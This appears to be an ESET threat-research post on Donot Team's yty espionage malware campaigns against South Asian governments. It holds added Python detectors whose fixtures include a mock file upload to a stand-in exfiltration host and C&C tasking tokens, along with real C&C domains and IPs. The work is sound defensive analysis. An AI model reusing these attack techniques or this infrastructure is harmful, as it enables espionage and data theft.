DoNot Go! Do not respawn!

ESET researchers take a deep look into the latest attacks carried out by Donot Team throughout 2020 and 2021, targeting government and military entities in several South Asian countries

Donot Team (also known as APT-C-35 and SectorE02) is a threat actor operating since at least 2016 and known for targeting organizations and individuals in South Asia with Windows and Android malware. A recent report by Amnesty International links the group's malware to an Indian cybersecurity company that may be selling the spyware or offering a hackers-for-hire service to governments of the region.

We have been closely following the activities of Donot Team, and have traced several campaigns that leverage Windows malware derived from the group's signature yty malware framework. According to our findings, the group is very persistent and has consistently targeted the same organizations for at least the last two years.

In this blogpost, we document two variants of the malware used in recent campaigns: DarkMusical and Gedit. For each of the variants, we analyze the whole attack chain and provide insight into how the group updates its tools, tactics, and techniques.

Targets

The campaigns of Donot Team are motivated by espionage, using their signature malware: the "yty" malware framework, whose main purpose is to collect and exfiltrate data. According to our telemetry, Donot Team focuses on a small number of targets in South Asia (Bangladesh, Sri Lanka, Pakistan and Nepal), as seen in Figure 1.

Figure 1. Countries targeted in recent Donot Team campaigns

These attacks are focused on:

  • Government and military organizations
  • Ministries of Foreign Affairs
  • Embassies

Going as far as targeting embassies of these countries in other regions, such as the Middle East, Europe, North America, and Latin America, is also not outside Donot Team's realm.

Try, try, try again

It is not a rarity for APT operators to attempt to regain access to a compromised network after they have been ejected from it. In some cases this is achieved through the deployment of a stealthier backdoor that remains quiet until the attackers need it; in other cases they simply restart their operation with new malware or a variant of the malware they used previously. The latter is the case with Donot Team operators, only that they are remarkably persistent in their attempts.

According to ESET telemetry, Donot Team has been consistently targeting the same entities with waves of spearphishing emails with malicious attachments every two to four months. Interestingly, the emails we were able to retrieve and analyze did not show signs of spoofing. Some emails were sent from the same organizations that were being attacked. It is possible that the attackers compromised the email accounts of some of their victims in earlier campaigns, or the email server used by those organizations.

With spearphishing emails, the attackers use malicious Microsoft Office documents to deploy their malware. We have seen Donot Team using at least three techniques. One is macros in Word, Excel and PowerPoint documents, such as the example seen in Figure 2.

Figure 2. Malicious macro in a PowerPoint document that drops a downloader executable and creates a scheduled task to run it

The second technique is RTF files with .doc extensions that exploit the memory corruption vulnerability CVE-2017-11882 in Equation Editor, shown in Figure 3. These RTF documents also contain two embedded DLLs as OLE objects (see Figure 4) that are used to install and download further components (both DLLs are described in the Gedit section). This allows the attackers to execute shellcode and requires no user interaction beyond opening the document. The shellcode deploys the main components of the malware.

Figure 3. CLSID of the COM object used by the RTF document to load the Equation Editor; the following OLE object contains the CVE-2017-11882 exploit

Figure 4. The OLE object headers of the DLLs also embedded in the RTF document

The third technique is remote RTF template injection, which allows the attackers to have a payload downloaded from a remote server when the RTF document is opened. This is achieved by inserting a URL in the optional \*\template control word of the RTF file format, instead of the location of a local file resource. The payload that Donot Team uses is another document that exploits CVE-2017-11882 and is loaded automatically once it is downloaded. This is shown in Figure 5.

Figure 5. When Word opens an RTF file with a remote template, it automatically attempts to download the resource
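Both RTF tricks described above are easy to spot statically once you know which groups to look at: the \*\template control word for remote template injection, and the \objclass / \objdata groups for an embedded object bound to Equation Editor. The following Python triage script is an added example written for this article, not code from the ESET report or from Donot Team. It flags a remote template target (http, https or UNC) and an OLE object that names Equation Editor either by ProgID or by its CLSID; that CLSID, 0002CE02-0000-0000-C000-000000000046, is a well-known Windows constant and not a value taken from the report. The sample RTF blobs at the bottom are constructed for the demonstration.

```python
"""Static triage of an RTF attachment for remote template injection and for
an embedded Equation Editor OLE object (the CVE-2017-11882 delivery vehicle)."""
import re
import uuid

# Equation Editor 3.0 COM class id (well-known Windows constant, assumed here).
EQNEDT_CLSID = uuid.UUID("0002CE02-0000-0000-C000-000000000046")
EQNEDT_CLSID_ON_DISK = EQNEDT_CLSID.bytes_le  # GUID byte order used inside OLE streams

# {\*\template <target>} : a remote target makes Word fetch it when the file opens
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s+([^}]+)\}", re.IGNORECASE)
# \objclass <ProgID> names the server that will handle the embedded object
OBJCLASS_RE = re.compile(rb"\\objclass\s+([\w.]+)")
# \objdata carries the OLE1 stream hex-encoded; class name and CLSID sit inside it
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")


def decode_objdata(hexblob: bytes) -> bytes:
    """Turn the whitespace-laden hex of an \\objdata group back into raw bytes."""
    clean = re.sub(rb"\s+", b"", hexblob)
    clean = clean[: len(clean) - len(clean) % 2]  # drop a dangling nibble
    try:
        return bytes.fromhex(clean.decode("ascii"))
    except ValueError:
        return b""


def triage_rtf(data: bytes) -> dict:
    """Report remote template targets and Equation Editor objects found in an RTF blob."""
    remote = []
    for m in TEMPLATE_RE.finditer(data):
        target = m.group(1).strip()
        if target.lower().startswith((b"http://", b"https://", b"\\\\")):
            remote.append(target.decode("latin-1"))

    equation = any(m.group(1).lower().startswith(b"equation")
                   for m in OBJCLASS_RE.finditer(data))
    ole_objects = 0
    for m in OBJDATA_RE.finditer(data):
        ole_objects += 1
        raw = decode_objdata(m.group(1))
        if EQNEDT_CLSID_ON_DISK in raw or b"Equation.3" in raw:
            equation = True

    return {
        "remote_templates": remote,
        "ole_objects": ole_objects,
        "equation_editor": equation,
        "suspicious": bool(remote) or equation,
    }


# --- constructed samples; not real Donot Team documents ----------------------
SAMPLE_REMOTE_TEMPLATE = (
    rb"{\rtf1\ansi{\*\template https://updates.example.invalid/blank.dotm}"
    rb"\par }"
)
_fake_ole1 = (
    b"\x01\x05\x00\x00\x02\x00\x00\x00"           # OLE1 version + format id
    + b"\x0b\x00\x00\x00" + b"Equation.3\x00"     # length-prefixed class name
    + b"\x00" * 8 + EQNEDT_CLSID_ON_DISK          # CLSID as it appears in OLE2 streams
)
SAMPLE_EQUATION = (
    b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objclass Equation.3}"
    b"{\\*\\objdata " + _fake_ole1.hex().encode("ascii") + b"}}}"
)
SAMPLE_BENIGN = b"{\\rtf1\\ansi\\deff0 Quarterly report.\\par }"

if __name__ == "__main__":
    for name, blob in [("remote template", SAMPLE_REMOTE_TEMPLATE),
                       ("equation object", SAMPLE_EQUATION),
                       ("benign", SAMPLE_BENIGN)]:
        print(f"{name}: {triage_rtf(blob)}")
```

A remote template whose target is an http(s) URL or UNC path is worth quarantining on its own: the malicious Equation Editor document only arrives at open time, so mailbox scanning never sees it, and a real document template from a server outside the organization is almost never expected.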

The yty malware framework

Discovered by NetScout in 2018, the yty malware framework is a less sophisticated and poorly developed successor to an older framework called EHDevel. The yty framework consists of a chain of downloaders that ultimately download a backdoor with minimal functionality, used to download and execute further components of Donot Team's toolset.

These include file collectors based on file extension and year of creation, screen capturers, keyloggers, reverse shells, and more. As seen in Figure 6, components for exfiltration gather the collected intelligence from staging folders and upload every file to a designated server used only for this purpose.

Figure 6. Component that resolves the folder name for staging JPEG screenshots (left) and exfiltration component that finds all files in the staging folder (right)

Staging folder names and locations are changed with almost every new campaign, as are some of the components' filenames. However, there are cases in which the names of components have remained unchanged, for example gedit.exe, wuaupdt.exe, lmpss.exe and disc.exe, among others. As seen in Figure 7, it seems that for every new campaign, in order to set new paths and filenames, these values must be changed in the source code and the component recompiled, as none of these components use a configuration block or file.

Figure 7. Encrypted strings containing locations and filenames that are frequently changed (top) and unencrypted values used in constructing the C&C URL (bottom)

The malware uses scheduled tasks for persistence, and alternates between DLL and EXE files between campaigns. In the case of DLLs, the scheduled tasks execute rundll32.exe to load them and call one of their exported functions.

The developers of the yty framework mainly rely on the C++ programming language. Likely in an attempt to evade detection, they have also ported their components to other languages such as VBScript, Python (packaged with PyInstaller), Visual C#, and AutoIt, among others. However, since 2019 we have only seen them leveraging components programmed in C++ (Figure 8) and Go (Figure 9).

Figure 8. Decompiled code of the component that captures screenshots, originally written in C++

Figure 9. Decompiled code of the component that captures screenshots, for the version written in Go

The malware usually uses two or three servers during its deployment. It may use one server throughout its chain of downloaders and a different server that the backdoor contacts in order to receive its commands and download further components, or use the same server for both purposes. A different server is always used for the upload of collected information. In some attacks Donot Team has reused C&C domains from previous attacks, both for downloads and exfiltration. As seen in Figure 10, Figure 11 and Figure 12, these components (later described as a variant we track as DarkMusical), used in the same attack, employed three different C&C domains.

Figure 10. The first downloader decrypts the URL of the server from which it downloads the next stage of the chain

Figure 11. In later stages, the backdoor uses a different server for C&C communications

Figure 12. The exfiltration components use yet a third server to upload the collected files

Timeline of attacks

Here we describe the malware variants used in recent Donot Team campaigns, with a focus on their Windows malware, from September 2020 until October 2021. For clarity, we have separated them into two variants of the yty malware framework, Gedit and DarkMusical, with one specific campaign using Gedit that we named Henos.

In Figure 13, we present a timeline of the attacks according to our telemetry. On our timeline we have also included attacks from another variant, known as the "Jaca framework". However, we will not describe it here, as it has been described extensively in this report by CN-SEC.

Figure 13. Timeline of Donot Team attacks from September 2020 to October 2021 according to ESET telemetry

DarkMusical

According to ESET telemetry, the first wave of attacks in which this variant was used occurred in June 2021, targeting military organizations in Bangladesh. We were only able to recover its chain of downloaders and its main backdoor. Given the small number of victims, we believe this might have been a highly targeted attack.

In September, a second wave of attacks that targeted military organizations in Nepal used new C&C servers and new file and staging folder names. We were able to recover a number of components downloaded by the backdoor, so we have decided to describe those attacks instead.

Spearphishing emails were sent with PowerPoint documents containing a macro that deploys the first component of a chain of downloaders and persists using a scheduled task. When potential victims open these documents, they are presented with a fake error message, as seen in Figure 14, and the documents remain devoid of any visible content.

Figure 14. Screenshot of a blank, malicious PowerPoint document

As seen in Figure 15, the chain of downloaders aims to download a final component that works as a backdoor with minimal functionality: it downloads standalone components, executes them using the ShellExecute Windows API, and retrieves and saves new C&C URLs.

The backdoor downloads the components that handle the collection and exfiltration of information to a dedicated server. These components do not communicate with the backdoor or the C&C to report on their activities; rather, they use a designated folder for staging the files, and a separate exfiltration component collects everything and uploads it.

Figure 15. Observed chain of compromise for DarkMusical

We decided to name this campaign DarkMusical because of the names the attackers chose for their files and folders: many are western celebrities or characters in the movie High School Musical. Table 1 briefly describes the purpose of each of the components in the chain of compromise.

Table 1. Components in the DarkMusical campaign chain of compromise

Filename       Description
rihana.exe     Dropped by the malicious document to %public%\Music\rihana.exe; persistence is established via a scheduled task named musudt.
               Downloads a file to %public%\Music\acrobat.dll and drops a BAT file to %public%\Music\sidilieicaliei.bat.
               The BAT file calls schtasks.exe to create the hmomci scheduled task, which executes rundll32.exe %public%\Music\acrobat.dll,nikioioeioolla.
acrobat.dll    Downloads a file and saves it as %public%\Music\swift.
               Additionally, can issue a systeminfo.exe command whose output is redirected to %public%\Music\justin. The contents of that file are sent to its C&C server.
               Drops and executes the file %public%\Music\janifer.bat, which performs several tasks:
                • Creates the folders Troy, Gabriella, and Taylor in %public%\Music with the archive, hidden, and system attributes.
                • Creates two scheduled tasks:
                  - sccmos, which executes %public%\Music\Troy\forbidden.exe
                  - msoudatee, which executes %public%\Music\Gabriella\remember.exe
                • Moves the swift file into the Gabriella folder and renames it to remember.exe
                • Attempts to delete acrobat.dll and rihana.exe
                • Deletes the scheduled tasks named hmomci and musudt
                • Deletes itself
remember.exe   Downloads a file to %public%\Music\Troy\forbidden.exe.
forbidden.exe  Uses the URL stored in the file %public%\Music\Taylor\flag; if there is no URL, it uses its default URL.
               Accepts three commands:
                • Set the URL in the flag file
                • Execute a file with the ShellExecute Windows API
                • Download a file to %public%\Music\Taylor
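Every stage in Table 1, like the yty framework generally (see the persistence paragraph earlier), comes back through a scheduled task: either rundll32.exe loading a DLL from %public%\Music by export name, or an EXE dropped under that folder. The task definitions are therefore the cheapest place to hunt. The script below is an added example written for this article, not ESET tooling: it parses Task Scheduler XML (the format produced by `schtasks /query /TN <name> /XML` and stored in the files under C:\Windows\System32\Tasks) and flags actions whose payload lives in a user-writable folder. The three task definitions it ships with are constructed to mirror the hmomci and msoudatee tasks above plus one legitimate Windows task; the lists of user-writable folders and LOLBins are my assumptions and should be tuned to the estate.

```python
"""Hunt Task Scheduler XML for the yty persistence pattern: a task that runs
rundll32.exe (or another LOLBin) against a payload in a user-writable folder,
or whose executable itself lives in one."""
import re
import sys
import xml.etree.ElementTree as ET  # use defusedxml.ElementTree for untrusted input

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Folders an unprivileged user can write to (assumed baseline; tune per estate).
USER_WRITABLE = re.compile(
    r"(\\users\\public\\|%public%|\\appdata\\|%appdata%|%localappdata%|%temp%"
    r"|\\users\\[^\\]+\\(?:documents|music|pictures|downloads)\\)",
    re.IGNORECASE,
)
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "cmd.exe", "powershell.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def review_task_xml(xml_text: str) -> list:
    """Return one finding per suspicious <Exec> action in a task definition."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="(no URI)", namespaces=NS)
    findings = []
    for action in root.iterfind(".//t:Actions/t:Exec", NS):
        command = (action.findtext("t:Command", default="", namespaces=NS) or "").strip()
        args = (action.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        exe = _basename(command)
        reasons = []
        if exe in LOLBINS and USER_WRITABLE.search(args):
            reasons.append(f"{exe} handed a payload in a user-writable path")
        if USER_WRITABLE.search(command):
            reasons.append("task executable lives in a user-writable path")
        if exe == "rundll32.exe" and re.search(r"\.dll\s*,\s*\w+", args, re.IGNORECASE):
            reasons.append("rundll32 invoking a named DLL export (the yty loading pattern)")
        if reasons:
            findings.append({"task": uri, "command": command,
                             "arguments": args, "reasons": reasons})
    return findings


def load_task_file(path: str) -> str:
    """Read a task definition from disk. Exported tasks are UTF-16 with an XML
    declaration that ElementTree rejects on str input, so decode and drop it."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8", "replace")
    return re.sub(r"^\s*<\?xml[^>]*\?>", "", text)


# --- constructed task definitions; not real exports from an infected host ----
TASK_HMOMCI = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\hmomci</URI></RegistrationInfo>
  <Actions Context="Author"><Exec>
    <Command>rundll32.exe</Command>
    <Arguments>C:\\Users\\Public\\Music\\acrobat.dll,nikioioeioolla</Arguments>
  </Exec></Actions>
</Task>"""
TASK_MSOUDATEE = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\msoudatee</URI></RegistrationInfo>
  <Actions Context="Author"><Exec>
    <Command>C:\\Users\\Public\\Music\\Gabriella\\remember.exe</Command>
  </Exec></Actions>
</Task>"""
TASK_BENIGN = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup</URI></RegistrationInfo>
  <Actions Context="Author"><Exec>
    <Command>%windir%\\system32\\cleanmgr.exe</Command>
    <Arguments>/autoclean</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    sources = [load_task_file(p) for p in sys.argv[1:]] or [TASK_HMOMCI, TASK_MSOUDATEE, TASK_BENIGN]
    for xml_text in sources:
        for hit in review_task_xml(xml_text):
            print(hit["task"], "->", hit["command"], hit["arguments"], "|", "; ".join(hit["reasons"]))
```

Run it with task files as arguments, or with no arguments to see the three constructed cases. The rundll32-with-export rule fires on its own even when the DLL path is unusual, which matters here because the staging folder changes with every campaign while the loading pattern does not.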

In Table 2 we describe the purpose of each component of the attacker's toolset.

Table 2. Description of components in the attacker's toolset for DarkMusical

Filename                     Description
serviceup.exe, sdudate.exe   Reverse shells.
srcot.exe                    Takes screenshots and saves them to %public%\Music\Symphony.
nDExiD.exe (three variants)  1. Collects files created in 2021 or later and copies them to the staging folder %public%\Music\Symphony. Collects files by extension: doc, docx, eml, inp, jpeg, jpg, msg, odt, pdf, pps, ppsx, ppt, pptx, rtf, txt, xls, xlsx.
                             2. Same as above, but files must have been created in 2020 or later.
                             3. File collector that monitors insertion of USB drives and changes within the file system. Collects the same document extensions as above, but also includes files with the extensions docm, mbox and pst.
upsvcsu.exe                  Exfiltrates collected files. Enumerates all files in %public%\Music\Symphony and uploads those that match the extensions: doc, docx, eml, inp, jpeg, jpg, msg, odt, pdf, pps, ppsx, ppt, pptx, rtf, txt, xls, xlsx.

Gedit

We detected the first attacks of the campaign using Gedit in September 2020, against organizations in Pakistan that had already been targeted with spearphishing and malicious RTF documents that installed the Jaca framework. Since then, Donot Team has moved on to focus on targets in Bangladesh, Nepal and Sri Lanka. The malware is clearly derived from the yty malware framework, but it is distinct enough to be separated from DarkMusical.

We were able to retrieve a spearphishing email corresponding to a Gedit campaign that occurred in February 2021, shown in Figure 16. The first attachment contained a list of personnel from a military entity in Bangladesh (and no malicious content). The second attachment showed nothing but a blank page while executing malicious code.

Figure 16. Screenshot of a spearphishing email sent by the attackers

We can see that the size of the second file is greater than 2 MB. It is an RTF file that exploits CVE-2017-11882 to drop two DLL files contained in the document and execute one of them. Other components are downloaded to the compromised computer in various stages. An overview of this attack chain and its malware components is shown in Figure 17.

Figure 17. Chain of compromise in Gedit campaigns

The components were coded in Go and in C++ (with the MinGW and Visual Studio compilers). We have chosen to describe the components used in the February 2021 campaign, which are shown in Table 3.

Table 3. Description of components for the Gedit variant

Filename      Description
vbtr.dll      Moves the file %TEMP%\bcs01276.tmp to %USERPROFILE%\Documents\msdn022.dll.
              Creates a scheduled task MobUpdate to execute rundll32.exe %USERPROFILE%\Documents\msdn022.dll,iorpiyhduj.
msdn022.dll   Downloads a file to %APPDATA%\mscx01102 (later renamed to Winhlp.exe).
              Writes and executes %APPDATA%\check.bat, which:
               • Writes to %USERPROFILE%\Policy\en-us\Files\wizard
               • Creates the scheduled task TaskReplace to execute %USERPROFILE%\inf\boost\OOO\nprint.exe
               • Creates the scheduled task MachineCore to execute %USERPROFILE%\CursorSize\Dates\Winhlp.exe
Winhlp.exe    Downloads a file to %USERPROFILE%\inf\boost\OOO\nprint.exe (if it does not exist or its size is less than 50 kB).
nprint.exe    Sends a request to a server and, depending on the reply, performs one of three actions:
               • If qwertyuiop is in the reply headers, a file is downloaded to %USERPROFILE%\Policy\en-us\Active\ under a filename that is also read from the headers
               • If asdfghjklzx is in the reply headers, it tries to execute %USERPROFILE%\Policy\en-us\Active\wuaupdt.exe
               • If zxcvbnmlkjhgfd is in the reply headers, it tries to execute %USERPROFILE%\Policy\en-us\Active\test.bat
              If the file %USERPROFILE%\Policy\en-us\Files\wizard exists, the URL of the server is retrieved from it and used instead of the one embedded in the executable.
wuaupdt.exe   Reverse shell.
lmpss.exe     Takes screenshots and saves them, in an infinite loop, to %USERPROFILE%\RemoteDesk\Apps.
innod.exe     File collector. Iterates recursively through drives, logging interesting files to %USERPROFILE%\Policy\en-us\Files\nohiucf. Files are copied to %USERPROFILE%\RemoteDesk\Apps.
              Looks for files with the extensions: doc, docx, xls, xlsx, ppt, pps, pptx, ppsx, pdf, inp, msg, jpg, jpeg, png, txt.
              Excludes the following files/folders: ., .., nohiucf, Windows, Recent Places, Temfile, Program Files, Program Files (x86), ProgramData, Microsoft, Package Cache.
              This component runs in an infinite loop, iterating drives from C: to H:.
gedit.exe     Sends collected files to a server. All files in %USERPROFILE%\RemoteDesk\Apps are sent one by one, unencrypted. There is no check on extension, other than excluding . and ..
              The victim identifier written to %USERPROFILE%\Policy\en-us\Files\wizard is appended to the URL. If the file does not exist, the default string HeloBSiamabcferss is used instead. The User-Agent is: If people are doubting how far you can go, go so far you cannot hear them anymore. Michele Ruiz.
              It creates a system event named aaaaaaaaa to make sure that only one instance of the component is running at a time.
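Two of the behaviours in Table 3 are visible on the wire: nprint.exe takes its tasking from tokens in the C&C response headers, and gedit.exe uploads files one by one, unencrypted, with a fixed quote as its User-Agent and a victim identifier (default HeloBSiamabcferss) appended to the URL. The script below is an added example for this article, not code from the report: it runs both checks over a captured request/response pair, the kind of thing a proxy or Zeek/Suricata pipeline would feed it. The HTTP messages are constructed; in particular, the exact layout of the token and filename in the response headers is an assumption, since the report only says they are "in the reply headers". The exfiltration path names (/upload, /uload, /backup) come from the IoC lists at the end of the article, and the User-Agent check keys on the quote's attribution so that minor differences in wording do not matter.

```python
"""Flag gedit.exe-style uploads and nprint.exe-style tasking in one HTTP exchange."""
import re

EXFIL_PATH_RE = re.compile(r"/(uload|upload|backup)(/|$)", re.IGNORECASE)  # from the IoC lists
DEFAULT_VICTIM_ID = "HeloBSiamabcferss"
UA_MARKER = "michele ruiz"  # attribution at the end of the gedit.exe User-Agent quote
TASKING_TOKENS = {          # nprint.exe header tokens and the action each triggers
    "qwertyuiop": "download a file into Policy\\en-us\\Active",
    "asdfghjklzx": "execute wuaupdt.exe (reverse shell)",
    "zxcvbnmlkjhgfd": "execute test.bat",
}


def parse_http(raw: str) -> dict:
    """Split a raw HTTP message into its start line, lower-cased header map and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip():
            headers[name.strip().lower()] = value.strip()
    return {"start": lines[0], "headers": headers, "body": body}


def inspect_exchange(request_raw: str, response_raw: str) -> list:
    """Return the Donot Team indicators found in a request and its response."""
    req, resp = parse_http(request_raw), parse_http(response_raw)
    method, _, rest = req["start"].partition(" ")
    path = rest.split(" ")[0]
    findings = []

    if UA_MARKER in req["headers"].get("user-agent", "").lower():
        findings.append("request: gedit.exe exfiltration User-Agent")
    if DEFAULT_VICTIM_ID in path:
        findings.append("request: default yty victim identifier in URL")
    is_multipart = "multipart/form-data" in req["headers"].get("content-type", "").lower()
    if method.upper() == "POST" and is_multipart and EXFIL_PATH_RE.search(path.split("?")[0]):
        findings.append(f"request: multipart file upload to exfiltration-style path {path}")

    for name, value in resp["headers"].items():
        for token, effect in TASKING_TOKENS.items():
            if token in name or token in value.lower():
                findings.append(f"response: nprint.exe tasking token {token} ({effect})")
    return findings


# --- constructed traffic; not a capture from a real incident ------------------
EXFIL_REQUEST = (
    "POST /upload/HeloBSiamabcferss HTTP/1.1\r\n"
    "Host: exfil.example.invalid\r\n"
    "User-Agent: If people are doubting how far you can go, go so far you cannot hear them anymore. Michele Ruiz.\r\n"
    "Content-Type: multipart/form-data; boundary=----x\r\n"
    "Content-Length: 128\r\n\r\n"
    "------x\r\nContent-Disposition: form-data; name=\"file\"; filename=\"budget.xlsx\"\r\n\r\n...\r\n------x--\r\n"
)
EXFIL_RESPONSE = "HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
TASKING_REQUEST = "GET /orderme HTTP/1.1\r\nHost: c2.example.invalid\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
TASKING_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/octet-stream\r\n"
    "qwertyuiop: 1\r\n"        # assumed layout: the token is a header name
    "X-File: wuaupdt.exe\r\n"  # assumed: the filename the report says is read from the headers
    "Content-Length: 3\r\n\r\nMZ\x00"
)
BENIGN_REQUEST = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
BENIGN_RESPONSE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    for label, pair in [("exfil", (EXFIL_REQUEST, EXFIL_RESPONSE)),
                        ("tasking", (TASKING_REQUEST, TASKING_RESPONSE)),
                        ("benign", (BENIGN_REQUEST, BENIGN_RESPONSE))]:
        print(label, inspect_exchange(*pair))
```

Because the uploads go over HTTPS as often as HTTP, the request-side rules only help where traffic is decrypted at a proxy; the response-header tokens are the more durable indicator, since they are the backdoor's command protocol and cannot change without recompiling nprint.exe.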

Henos campaign

Finally, it is worth mentioning a wave of attacks that occurred between February and March 2021, targeting military organizations in Bangladesh and Sri Lanka. These attacks used the Gedit variant of the malware, but with some minor modifications. We therefore decided to name this campaign Henos in our timeline, after its backdoor DLL, henos.dll.

Samples belonging to components of this wave of attacks were also reported online in February, which probably explains why the group did not use the components again (see this tweet by Shadow Chaser Group researchers, for example).

Although we did not find the corresponding spearphishing emails or malicious documents, the attack chain is presumably the same as described above, with some minor differences in how the components are executed. An overview of this is shown in Figure 18.

Figure 18. Chain of compromise of the Henos campaign

While some of the components of this campaign are named javatemp.exe and pytemp.exe, these filenames were probably only chosen in an attempt to mimic legitimate software such as Java or Python. pytemp.exe and plaapas.exe were coded in Go, whereas javatemp.exe was coded in C++ (compiled with MinGW).

One final note is that the component that performs exfiltration of files, pytemp.exe, checks whether gedit.exe is running. If two or more instances are found, it exits. We believe this is a mistake by the programmers, as it should check for pytemp.exe instead. However, this simple mistake helps us tie the Henos campaign to the Gedit variant of the malware (in addition to code similarity).

Conclusion

Donot Team makes up for its low sophistication with tenacity. We expect that it will continue to push on regardless of its many setbacks. Only time will tell whether the group evolves its current TTPs and malware.

For any inquiries, or to make sample submissions related to the subject, contact us at [email protected].

Indicators of Compromise (IoCs)

A comprehensive list of Indicators of Compromise (IoCs) and samples can be found in our GitHub repository.

Gedit – October 2021

Samples

SHA-1 Filename ESET detection name
78E82F632856F293BDA86D77D02DF97EDBCDE918 cdc.dll Win32/TrojanDownloader.Donot.C
D9F439E7D9EE9450CD504D5791FC73DA7C3F7E2E wbiosr.exe Win32/TrojanDownloader.Donot.D
CF7A56FD0613F63418B9DF3E2D7852FBB687BE3F vdsc.exe Win32/TrojanDownloader.Donot.E
B2263A6688E512D90629A3A621B2EE003B1B959E wuaupdt.exe Win32/ReverseShell.J
13B785493145C85B005E96D5029C20ACCFFE50F2 gedit.exe Win32/Spy.Donot.A
E2A11F28F9511753698BA5CDBAA70E8141C9DFC3 wscs.exe Win32/Spy.Donot.B
F67ABC483EE2114D96A90FA0A39496C42EF050B5 gedit.exe Win32/Spy.Donot.B

Network

Download servers

  • https://request.soundedge[.]live/access/nasrzolofuju
  • https://request.soundedge[.]live/access/birkalirajliruajirjiairuai
  • https://share.printerjobs[.]xyz/id45sdjscj/

Exfiltration server

  • https://submin.seasonsbackup[.]xyz/backup/

Reverse shell server

Gedit – July 2021

Samples

SHA-1 Filename ESET detection name
A71E70BA6F3CD083D20EDBC83C72AA823F31D7BF hxedit.exe Win32/TrojanDownloader.Donot.N
E101FB116F05B7B69BD2CAAFD744149E540EC6E9 lmpss.exe Win64/HackTool.Ligolo.A
89D242E75172C79E2F6FC9B10B83377D940AE649 gedit.exe WinGo/Spy.Donot.A
B42FEFE2AB961055EA10D445D9BB0906144647CE gedit.exe WinGo/Spy.Donot.A
B0704492382186D40069264C0488B65BA8222F1E disc.exe Win32/Spy.Donot.L
1A6FBD2735D3E27ECF7B5DD5FB6A21B153FACFDB disc.exe Win32/Spy.Donot.A
CEC2A3B121A669435847ADACD214BD0BE833E3AD disc.exe Win32/Spy.Donot.M
CBC4EC0D89FA7A2AD1B1708C5A36D1E304429203 disc.exe Win32/Spy.Donot.A
9371F76527CA924163557C00329BF01F8AD9E8B7 gedit.exe Win32/Spy.Donot.J
B427744B2781BC344B96907BF7D68719E65E9DCB wuaupdt.exe Win32/TrojanDownloader.Donot.W

Network

Download server

  • request.submitonline[.]club/orderme/

Exfiltration servers

  • oceansurvey[.]club/upload/
  • request.soundedge[.]live//uload

Reverse shell servers

  • 80.255.3[.]67
  • 37.48.122[.]145

Gedit – February/March 2021

Samples

SHA-1 Filename ESET detection name
A15D011BED98BCE65DB597FFD2D5FDE49D46CFA2 BN_Webmail_List 2020.doc Win32/Exploit.Agent.UN
6AE606659F8E0E19B69F0CB61EB9A94E66693F35 vbtr.dll Win32/Spy.Donot.G
0290ABF0530A2FD2DFB0DE29248BA3CABB58D2AD bcs01276.tmp (msdn022.dll) Win32/TrojanDownloader.Donot.P
66BA21B18B127DAA47CB16AB1F2E9FB7DE3F73E0 Winhlp.exe Win32/TrojanDownloader.Donot.J
79A5B10C5214B1A3D7CA62A58574346C03D54C58 nprint.exe Win32/TrojanDownloader.Donot.K
B427744B2781BC344B96907BF7D68719E65E9DCB wuaupdt.exe Win32/TrojanDownloader.Donot.W
E423A87B9F2A6DB29B3BA03AE7C4C21E5489E069 lmpss.exe WinGo/Spy.Donot.B
F43845843D6E9FB4790BF70F1760843F08D43790 innod.exe Win32/Spy.Donot.G
4FA31531108CC68FF1865E2EB5654F7B3DA8D820 gedit.exe Win32/Spy.Donot.G

Network

Download servers

  • firm.tplinkupdates[.]space/8ujdfuyer8d8f7d98jreerje
  • firm.tplinkupdates[.]space/yu37hfgde64jskeruqbrgx
  • space.lovingallupdates[.]life/orderme

Exfiltration server

  • oceansurvey[.]club/upload/

Reverse shell server

Gedit – September 2020

Samples

SHA-1 Filename ESET detection name
49E58C6DE5245796AEF992D16A0962541F1DAE0C lmpss.exe Win32/Spy.Donot.H
6F38532CCFB33F921A45E67D84D2796461B5A7D4 prodot.exe Win32/TrojanDownloader.Donot.K
FCFEE44DA272E6EB3FC2C071947DF1180F1A8AE1 prodot.exe Win32/TrojanDownloader.Donot.S
7DDF48AB1CF99990CB61EEAEB3ED06ED8E70A81B gedit.exe Win32/TrojanDownloader.Donot.AA
DBC8FA70DFED7632EA21B9AACA07CC793712BFF3 disc.exe Win32/Spy.Donot.I
CEF05A2DAB41287A495B9413D33F14D94A568C83 wuaupdt.exe Win32/Spy.Donot.A
E7375B4F37ECEA77FDA2CEA1498CFB30A76BACC7 prodot.exe Win32/TrojanDownloader.Donot.AA
771B4BEA921F509FC37016F5FA22890CA3338A65 apic.dll Win32/TrojanDownloader.Donot.A
F74E6C2C0E26997FDB4DD89AA3D8BD5B270637CC njhy65tg.dll Win32/TrojanDownloader.Donot.O

Network

Download servers

